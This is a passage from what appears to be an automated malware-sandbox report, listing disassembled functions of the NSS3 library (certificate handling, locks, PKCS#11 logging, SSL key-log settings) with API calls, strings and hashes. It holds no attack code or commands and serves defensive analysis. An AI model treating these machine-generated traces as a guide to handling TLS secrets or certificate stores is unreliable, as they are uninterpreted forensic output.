memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C77DF33
free.MOZGLUE(00000000), ref: 6C77DF3C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C77DF4B
free.MOZGLUE(00000000), ref: 6C77DF74
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C77DF8E

Strings

(NULL) (Validity Unknown), xrefs: 6C77DEFA
{???}, xrefs: 6C77DE8B
%s%s, xrefs: 6C77DEEB

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
String ID: %s%s$(NULL) (Validity Unknown)${???}
API String ID: 1882561532-3437882492
Opcode ID: 64a357cd61dc1dbd33860789d3a248935d4efe2f1c653641c3281bb53eacdb9b
Instruction ID: da70c0fe1a26c820679c85fe003afede97e11077841fd014f31e622b8eea0e76
Opcode Fuzzy Hash: 64a357cd61dc1dbd33860789d3a248935d4efe2f1c653641c3281bb53eacdb9b
Instruction Fuzzy Hash: E151F2B1E001099BDF209F658E45AAF7AB9AF95358F144438E819E7B00E731E904CBF2

Function 6C7B2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C7B2DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C7B2E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7B2E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7B2E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C784F1C,?,-00000001,00000000,?), ref: 6C7B2E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C784F1C,?,-00000001,00000000), ref: 6C7B2E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C7B2EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C7B2EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C7B2EF8
PR_Unlock.NSS3(?), ref: 6C7B2F62
TlsGetValue.KERNEL32 ref: 6C7B2F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C7B2F9E
PR_Unlock.NSS3(?), ref: 6C7B2FCA
TlsGetValue.KERNEL32 ref: 6C7B301A
EnterCriticalSection.KERNEL32(?), ref: 6C7B302E
PR_Unlock.NSS3(?), ref: 6C7B3066
PR_SetError.NSS3(00000000,00000000), ref: 6C7B3085
PR_Unlock.NSS3(?), ref: 6C7B30EC
TlsGetValue.KERNEL32 ref: 6C7B310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C7B3124
PR_Unlock.NSS3(?), ref: 6C7B314C

Part of subcall function 6C799180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C7C379E,?,6C799568,00000000,?,6C7C379E,?,00000001,?), ref: 6C79918D
Part of subcall function 6C799180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C7C379E,?,6C799568,00000000,?,6C7C379E,?,00000001,?), ref: 6C7991A0

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

PR_SetError.NSS3(00000000,00000000), ref: 6C7B316D

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 8104c93c1cf2ba66d2af22fd7740f98f4d354cb5b0ae21e273bd5d6050997c1b
Instruction ID: b591ae05f0b4577022efdb5a90a887cdc141243c1516ac9588765464985c27bb
Opcode Fuzzy Hash: 8104c93c1cf2ba66d2af22fd7740f98f4d354cb5b0ae21e273bd5d6050997c1b
Instruction Fuzzy Hash: EDF1AEB5D00609AFDF11DF68D988B99BBB8BF09318F144179EC04A7B11EB31E995CB81

Function 6C7AAF20 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6C7AAF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7AAF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7AAF83

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7AAF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C7AAFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C7AAFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C7AAFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C7AB00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C7AB028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C7AB041

Strings

pParameter = 0x%p, xrefs: 6C7AAFB9
hSession = 0x%x, xrefs: 6C7AAF5E, 6C7AAF6E
pulSignatureLen = 0x%p, xrefs: 6C7AB03C
ulParameterLen = 0x%p, xrefs: 6C7AAFD4
ulDataLen = %d, xrefs: 6C7AB00A
C_SignMessage, xrefs: 6C7AAF41
pData = 0x%p, xrefs: 6C7AAFEF
pSignature = 0x%p, xrefs: 6C7AB023
(CK_INVALID_HANDLE), xrefs: 6C7AAF7C

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage
API String ID: 1003633598-1612141141
Opcode ID: 1ca4dced24910019585517135164bf94380cf118aae457a89665ec257ac73513
Instruction ID: 34a1641d400dae5ce9b8c2da7217bf5c3d490182b51da7b3857cd1c6f5171dc5
Opcode Fuzzy Hash: 1ca4dced24910019585517135164bf94380cf118aae457a89665ec257ac73513
Instruction Fuzzy Hash: BB41D235602058AFDB308F98DF4CE9A7BB1AB4631DF088475E80867B12D734B819DBE1

Function 6C799FA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C799FBE

Part of subcall function 6C772F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C772F0A
Part of subcall function 6C772F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C772F1D

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C79A015

Part of subcall function 6C7B1940: TlsGetValue.KERNEL32(00000000,00000000,?,00000001,?,6C7B563C,?,?,00000000,00000001,00000002,?,?,?,?,?), ref: 6C7B195C
Part of subcall function 6C7B1940: EnterCriticalSection.KERNEL32(?,?,6C7B563C,?,?,00000000,00000001,00000002,?,?,?,?,?,6C78EAC5,00000001), ref: 6C7B1970
Part of subcall function 6C7B1940: PR_Unlock.NSS3(?,?,00000000,00000001,00000002,?,?,?,?,?,6C78EAC5,00000001,?,6C78CE9B,00000001,6C78EAC5), ref: 6C7B19A0

PL_FreeArenaPool.NSS3(?), ref: 6C79A067
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C79A055

Part of subcall function 6C6F4C70: TlsGetValue.KERNEL32(?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4C97
Part of subcall function 6C6F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CB0
Part of subcall function 6C6F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CC9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C79A07E
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C79A0B1
PL_FreeArenaPool.NSS3(?), ref: 6C79A0C7
PL_FinishArenaPool.NSS3(?), ref: 6C79A0CF
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C79A12E
PL_FreeArenaPool.NSS3(?), ref: 6C79A140
PL_FinishArenaPool.NSS3(?), ref: 6C79A148
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C79A158
PL_FinishArenaPool.NSS3(?), ref: 6C79A175
CERT_AddCertToListTail.NSS3(00000000,00000000), ref: 6C79A1A5
CERT_DestroyCertificate.NSS3(00000000), ref: 6C79A1B2
free.MOZGLUE(00000000), ref: 6C79A1C6
CERT_DestroyCertList.NSS3(00000000), ref: 6C79A1D6

Part of subcall function 6C7B55E0: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,6C78EAC5,00000001,?,6C78CE9B,00000001,6C78EAC5,00000003,-00000004,00000000,?,6C78EAC5), ref: 6C7B5627
Part of subcall function 6C7B55E0: PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0,?,?,?,?,?,?,?,?,?,?,6C78EAC5,00000001,?,6C78CE9B), ref: 6C7B564F
Part of subcall function 6C7B55E0: PL_FreeArenaPool.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C78EAC5,00000001), ref: 6C7B5661
Part of subcall function 6C7B55E0: PR_SetError.NSS3(FFFFE01A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C78EAC5), ref: 6C7B56AF

Strings

security, xrefs: 6C79A00F

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Arena$Pool$CallFreeOnce$CertErrorFinishList$CriticalDestroyEnterInitSectionUnlockUtilValue$Alloc_Arena_CertificateTailfree
String ID: security
API String ID: 3250630715-3315324353
Opcode ID: 2acd9c528a2b4b1712cd4b9cc7efbcc5b0973a3ea9d865d47d19b9cb493584a1
Instruction ID: a0902786e0723be7a01a1ac40a35340f03ace213605973aabad7f972ae45e9b6
Opcode Fuzzy Hash: 2acd9c528a2b4b1712cd4b9cc7efbcc5b0973a3ea9d865d47d19b9cb493584a1
Instruction Fuzzy Hash: 90512C71D412095BEB109FA8EF48FAE7375AF4135CF110434E815AAB41F775EA09C7A2

Function 6C7B4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C7B4C4C
EnterCriticalSection.KERNEL32(?), ref: 6C7B4C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4DB7

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

TlsGetValue.KERNEL32 ref: 6C7B4DD7
EnterCriticalSection.KERNEL32(?), ref: 6C7B4DEC
PR_Unlock.NSS3(?), ref: 6C7B4E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C7B4E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B4E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C7B4E71
free.MOZGLUE(00000000), ref: 6C7B4E7A
PR_Unlock.NSS3(?), ref: 6C7B4EA2
TlsGetValue.KERNEL32 ref: 6C7B4EC1
EnterCriticalSection.KERNEL32(?), ref: 6C7B4ED6
PR_Unlock.NSS3(?), ref: 6C7B4F01
free.MOZGLUE(00000000), ref: 6C7B4F2A

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 727d5017a638ecbcd4dc0aa8c2e5125a54fd124a8c102f563fc562ac0f20192d
Instruction ID: ec8c7df82bcf2f38596656dbe0212dcb29dc24278eb7d74379cc5a056d0e82e0
Opcode Fuzzy Hash: 727d5017a638ecbcd4dc0aa8c2e5125a54fd124a8c102f563fc562ac0f20192d
Instruction Fuzzy Hash: 75B1D075A00206AFDB11EF68D985BAA77B8BF4531CF044138ED15A7B01EB34EA64CBD1

Function 6C7BFFB0 Relevance: 30.1, APIs: 20, Instructions: 68COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7BFFB4

Part of subcall function 6C8398D0: calloc.MOZGLUE(00000001,00000084,6C760936,00000001,?,6C76102C), ref: 6C8398E5

PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7BFFC6

Part of subcall function 6C8398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C839946
Part of subcall function 6C8398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6F16B7,00000000), ref: 6C83994E
Part of subcall function 6C8398D0: free.MOZGLUE(00000000), ref: 6C83995E

PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7BFFD6
PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7BFFE6
PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7BFFF6
PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7C0006
PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7C0016
PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7C0026
PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7C0036
PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7C0046
PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7C0056
PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7C0066
PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7C0076
PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7C0086
PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7C0096
PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7C00A6
PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7C00B6
PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7C00C6
PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7C00D6
PR_NewLock.NSS3(?,?,6C7B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7875C2,00000000), ref: 6C7C00E6

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Lock$CountCriticalErrorInitializeLastSectionSpincallocfree
String ID:
API String ID: 1407103528-0
Opcode ID: fba4486b8f74905839fc5ef561d7fd8cae9b68f4ba95c59b50a4d5a81f36679c
Instruction ID: 3dfe8c8c57f706226a7f7e489da0d98df58e5d7655f807f0a904eb5f517bfdd8
Opcode Fuzzy Hash: fba4486b8f74905839fc5ef561d7fd8cae9b68f4ba95c59b50a4d5a81f36679c
Instruction Fuzzy Hash: 883129F0E016349E8B79DF69C24814B3AB9B75661EB10753ADC0887B10DBBC294ACFD5

Function 6C806E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C806BF7), ref: 6C806EB6

Part of subcall function 6C761240: TlsGetValue.KERNEL32(00000040,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761267
Part of subcall function 6C761240: EnterCriticalSection.KERNEL32(?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C76127C
Part of subcall function 6C761240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761291
Part of subcall function 6C761240: PR_Unlock.NSS3(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C7612A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C8AFC0A,6C806BF7), ref: 6C806ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C806EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C806EFC
PR_NewLock.NSS3 ref: 6C806F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C806F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C806BF7), ref: 6C806F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C806BF7), ref: 6C806F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C806BF7), ref: 6C806FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C806BF7), ref: 6C806FFD

Strings

SSLFORCELOCKS, xrefs: 6C806F2B
# SSL/TLS secrets log file, generated by NSS, xrefs: 6C806EF7
NSS_SSL_CBC_RANDOM_IV, xrefs: 6C806FF8
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C806F4F
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C806FDB
SSLKEYLOGFILE, xrefs: 6C806EB1

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: de70a6bfc51a93dd1f2812c1bbbb3a573537c33acf5a0ac78d420706abcbd2d2
Instruction ID: 2100a8395ec26f823698cc0c8035fa9a7991e1eb2029b430a1e4ea75bcb78974
Opcode Fuzzy Hash: de70a6bfc51a93dd1f2812c1bbbb3a573537c33acf5a0ac78d420706abcbd2d2
Instruction Fuzzy Hash: D6A1C5B2B559958AF6304A3CCE0174437A2AB9332EF994B79EC31C7ED5DB75A480C381

Function 6C785DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C785DEC
PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C785E0F
PORT_ZAlloc_Util.NSS3(00000828), ref: 6C785E35
SECKEY_CopyPublicKey.NSS3(?), ref: 6C785E6A
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C785EC3
NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6C785ED9
SECKEY_SignatureLen.NSS3(?), ref: 6C785F09
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C785F49
SECKEY_DestroyPublicKey.NSS3(?), ref: 6C785F89
free.MOZGLUE(?), ref: 6C785FA0
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C785FB6
free.MOZGLUE(00000000), ref: 6C785FBF
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C78600C
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C786079
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C786084
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C786094

Strings

, xrefs: 6C785EEB

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

